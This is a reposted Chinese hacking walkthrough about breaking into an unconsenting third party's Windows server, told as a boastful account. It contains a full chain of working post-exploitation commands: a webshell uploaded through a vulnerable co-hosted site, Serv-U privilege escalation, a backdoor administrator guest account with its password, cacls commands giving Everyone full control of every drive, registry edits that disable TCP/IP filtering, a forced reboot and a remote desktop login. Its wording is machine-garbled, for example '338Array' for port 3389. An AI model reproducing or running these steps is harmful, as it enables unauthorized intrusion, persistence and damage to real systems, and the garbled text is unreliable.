当前位置:七道奇文章资讯安全技术网络技术
日期:2011-07-10 12:56:00  来源:本站整理

安检全程:从上传webshell到冲破TCP/IP挑选到3389终端登陆[网络技术]

赞助商链接



  本文“安检全程:从上传webshell到冲破TCP/IP挑选到3389终端登陆[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

一:得到webshell
本日晚上的一次小小测试,由于本人太菜,再高深的技术我也不会,只能这样了..........
一切都已经过去了,没有办法补图了,但愿能看的懂这个小帖子.
本日有是无聊的一天,晚上实在无聊没有事情干,就到一个视频聊天站点看秀,嘿嘿~
忽然发现一个聊天室分外的暴躁,人数已经有500人在里面了(满员了),刷了n次也没有进去..........越发忧郁了!:(
想想反正也是没有事情做,测试一下主机安全做的怎么样吧,呵呵(太菜,说测试人家安全实在是举高自己了)
在cmd下ping了一下得到了对方的ip,然后登陆http://whois.webhosting.info/对方ip看看有没有其他的站点,哈,这下发了,上面有几十个站点,预计我还是能找到一个两个带漏洞的站点的`
经过冗长的查找,终于找到一个动易带漏洞的页面http://www.xxxx.net/Upfile_Soft.asp,上传一个webshell(海阳2005正式版)先(怎么上传我就不罗嗦了,上传工具目前漫天飘了).
二:成功晋升权限成立用户

拿到webshell后高高兴兴的登陆了,忽然发现什么权限都没有,只能在自己的webshell所在的目录里面打转(c.d.e.f盘都浏览不了),连删除文件的权限都没有,忧郁呀........
回到〖Server〗下看看主机开了什么服务吧,经过发现他开了终端服务和serv-u服务,哈,这下有搞头了^_^用superscan扫描了一下他的ip,公然通过banner看出他是用的serv-u,版本5.0.
到〖Wscript.Shell〗下面试试看能履行cmd号令不能,输入net user后没有反映,再试通过Wscript.Shell能履行cmd号令不能,再次输入net user后履行返回了对方的user名单,哈哈,这下好了,能拿下了!!
上传serv-u晋升工具到D:/a004/tggtwe/****.com/UploadSoft目录下面,改名为:test.exe,然后回到〖Wscript.Shell〗下履行号令去了,嘿嘿,即刻一只肥鸡就要到手了,高兴ing~
通过Wscript.Shell履行cmd号令:
D:/a004/tggtwe/****.com/UploadSoft/test.exe "net user guest /active:yes" #激活guest账号,我喜好用这个账号
D:/a004/tggtwe/****.com/UploadSoft/test.exe "net user guest lvhuana" #把guest账号的密码设定为lvhuana
D:/a004/tggtwe/****.com/UploadSoft/test.exe "net localgroup administrators guest /add" #晋升guest权限到admin权限
好了,账号成立完毕,履行一下net localgroup administrators看看成功没,通过回显知道增添成功了.然后履行netstat -an后看到他开的终端端口是默许的338Array,OK,衔接试试~

三:办理TCP/IP挑选
衔接不上!?晕...........再拿出superscan来扫一下他的338Array,根本扫不到........(开了防火墙!?靠,我的点真背.....)
没有办法了,再次回到Wscript.Shell履行cmd号令:
D:/a004/tggtwe/****.com/UploadSoft/test.exe "cacls.exe c: /e /t /g everyone:F" #把c盘设置为everyone可以浏览
D:/a004/tggtwe/****.com/UploadSoft/test.exe "cacls.exe d: /e /t /g everyone:F" #把d盘设置为everyone可以浏览
D:/a004/tggtwe/****.com/UploadSoft/test.exe "cacls.exe e: /e /t /g everyone:F" #把e盘设置为everyone可以浏览
D:/a004/tggtwe/****.com/UploadSoft/test.exe "cacls.exe f: /e /t /g everyone:F" #把f盘设置为everyone可以浏览
这下最少可以遍历整个硬盘了,我在硬盘里面处处的翻,找遍了也没有找到他的防火墙文件,这下心里有数了,必定是他举行TCP/IP挑选了!(当然也有是内网做服务器的大概,具体大家自己可以按照ipconfig -all来判断)
冲破TCP/IP挑选我们可以更改他的注册表来实现,我们要做的就是导出他注册表的三处,更改后再导入便可以了,回到〖Wscript.Shell〗履行cmd号令:
D:/a004/tggtwe/****.com/UploadSoft/test.exe "regedit -e D:/a004/tggtwe/****.com/UploadSoft/1.reg HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Services/Tcpip" #导出注册表里关于TCP/IP挑选的第一处
D:/a004/tggtwe/****.com/UploadSoft/test.exe "regedit -e D:/a004/tggtwe/****.com/UploadSoft/2.reg HKEY_LOCAL_MACHINE/SYSTEM/ControlSet002/Services/Tcpip" #导出注册表里关于TCP/IP挑选的第二处
D:/a004/tggtwe/****.com/UploadSoft/test.exe "regedit -e D:/a004/tggtwe/****.com/UploadSoft/3.reg HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip" #导出注册表里关于TCP/IP挑选的第三处
然后回到〖Stream〗或〖FSO〗发现1.reg,2.reg,3.reg已经安静的躺在那边了,嘿嘿~
把1.reg,2.reg,3.reg下载回来到自己的硬盘里面编辑一下,把关于TCP/IP挑选的几个地方改一下,首先翻开1.reg找到"EnableSecurityFilters"=dword:00000001把最背面的数字1改成0后保存,然后更改2.reg,3.reg,更改办法一样,我就不再罗嗦了~
然后我们把1.reg,2.reg,3.reg再上传回对方的机械里面(这里我们要选上覆盖情势,因为没有权限删除本来的1.reg,2.reg,3.reg),上传成功后再回到〖Wscript.Shell〗履行cmd号令:
D:/a004/tggtwe/****.com/UploadSoft/test.exe "regedit -s D:/a004/tggtwe/****.com/UploadSoft/1.reg" #安静情势下把我们改正完的1.reg导入到他的注册表
D:/a004/tggtwe/****.com/UploadSoft/test.exe "regedit -s D:/a004/tggtwe/****.com/UploadSoft/2.reg" #安静情势下把我们改正完的2.reg导入到他的注册表
D:/a004/tggtwe/****.com/UploadSoft/test.exe "regedit -s D:/a004/tggtwe/****.com/UploadSoft/3.reg" #安静情势下把我们改正完的3.reg导入到他的注册表
OK!导入后重新启动他的机械后在能办理TCP/IP挑选问题,再在〖Wscript.Shell〗履行cmd号令:
D:/a004/tggtwe/****.com/UploadSoft/test.exe "iisreset /reboot /timeout:00" #操纵他自身的iis服务来重新启动他的机械,/timeout:00这个参数是让他当即重新启动
履行完后我们再用superscan已经扫不到他了,吼吼~已经重新启动了!
四:胜操纵终端登陆
经过冗长的等候后(其及时间不长,只是我在这里已经等不及了,嘿嘿~),终于可以用superscan扫到他了,并且可以扫到他的338Array端口了,哈哈,终于成功了,拿出终端登陆器顺利的用我方才成立的user:guest,pass:lvhuana登陆上了!
好了,这篇垃圾文章在www.110hack.com就到此就该完毕了,也该收工睡觉了~


  以上是“安检全程:从上传webshell到冲破TCP/IP挑选到3389终端登陆[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • 安检全程:从上传webshell到冲破TCP/IP挑选到3389终端登陆
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .